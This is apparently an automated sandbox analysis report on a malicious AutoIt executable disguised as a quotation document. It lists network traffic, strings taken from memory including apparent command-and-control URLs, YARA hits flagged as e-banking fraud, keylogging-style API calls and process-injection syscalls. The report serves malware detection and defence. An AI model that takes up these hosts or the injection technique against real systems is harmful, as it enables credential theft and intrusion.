5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 10:29:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5wyHZFDWCQJTIsAigyTGmhF8GDx5bKSuWrXHTdPmzqLhXtEdPiMd3RzbWqsX9yUDJ4%2BUynC5w8uEHXnsISzeFUb9Tjx6YfqIJO45th83sM6y3SkID9qLwMfRQcJvnSSWW%2BPTgtVv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 920317acb9d6424c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=523&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica,
                Source: reg.exe, 00000003.00000002.3413365532.0000000004D60000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003F70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Autoresponder_Marketing.cfm?fp=y0rjdxcdoANYIcILFoWoqPFXvvI7qm0YiuaMoAwxOEJ4
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Book_Airline_Tickets.cfm?fp=y0rjdxcdoANYIcILFoWoqPFXvvI7qm0YiuaMoAwxOEJ4BqQ
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Chat_Rooms.cfm?fp=y0rjdxcdoANYIcILFoWoqPFXvvI7qm0YiuaMoAwxOEJ4BqQrOjhAxs90p
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Google_Adwords.cfm?fp=y0rjdxcdoANYIcILFoWoqPFXvvI7qm0YiuaMoAwxOEJ4BqQrOjhAx
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Living.cfm?fp=y0rjdxcdoANYIcILFoWoqPFXvvI7qm0YiuaMoAwxOEJ4BqQrOjhAxs90pcYaQ
                Source: reg.exe, 00000003.00000002.3413365532.00000000053A8000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.00000000045B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: reg.exe, 00000003.00000002.3413365532.00000000053A8000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.00000000045B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: reg.exe, 00000003.00000002.3413365532.00000000053A8000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.00000000045B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=Z2JBZmdxaHFXSnlCSWpPeEpRSHZMQ2xyZ3BHZTFOalZNdmVHVEFaW
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Mylivingbio.online
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mylivingbio.online/__media__/design/underconstructionnotice.php?d=mylivingbio.online
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3415448233.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mylivingbio.online/__media__/js/trademark.php?d=mylivingbio.online&type=ns
                Source: 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3414676780.00000000056A8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.super-mist.store
                Source: 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3414676780.00000000056A8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.super-mist.store/l6hh/
                Source: 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000004D92000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.super-mist.store/l6hh/?1XnHA=lTdr3okON/nO134jHjo5j9MCA0yiAAI
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: reg.exe, 00000003.00000002.3413365532.0000000004586000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.00000000045B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: reg.exe, 00000003.00000002.3410869469.00000000034EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: reg.exe, 00000003.00000002.3410869469.00000000034EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: reg.exe, 00000003.00000003.1286124234.00000000083A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: reg.exe, 00000003.00000002.3410869469.00000000034EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: reg.exe, 00000003.00000002.3410869469.00000000034EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: reg.exe, 00000003.00000002.3410869469.00000000034EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: reg.exe, 00000003.00000002.3410869469.00000000034EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                Source: reg.exe, 00000003.00000002.3413365532.00000000059F0000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000003.00000002.3413365532.0000000004BCE000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000003DDE000.00000004.00000001.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000004C00000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: reg.exe, 00000003.00000002.3415829574.00000000083CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: reg.exe, 00000003.00000002.3413365532.0000000005216000.00000004.10000000.00040000.00000000.sdmp, 3kdbs1NJMiXeHlFl.exe, 00000005.00000002.3412769773.0000000004426000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.utzp.top/d478/?1XnHA=yZiSYoN2a3htTd2ewqQl0
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C7001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00C7001C
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: 0_2_00C9CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C9CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3410503483.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100047298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412367873.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3414676780.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3412285944.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100405446.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1100935711.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3412469604.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\Circular No.12-7 Quotation.exeCode function: This is a third-party compiled AutoIt script.0_2_00C13B3A
                Source: Circular No.12-7 Quotation.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Circular No.12-7 Quotation.exe, 00000000.00000002.965338403.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ecc25e66-a
                Source: Circular No.12-7 Quotation.exe, 00000000.00000002.965338403.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d9e8aa83-b
                Source: Circular No.12-7 Quotation.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_945290ee-9
                Source: Circular No.12-7 Quotation.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6d8cd6a6-1
                Source: initial sampleStatic PE information: Filename: Circular No.12-7 Quotation.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C8E3 NtClose,1_2_0042C8E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
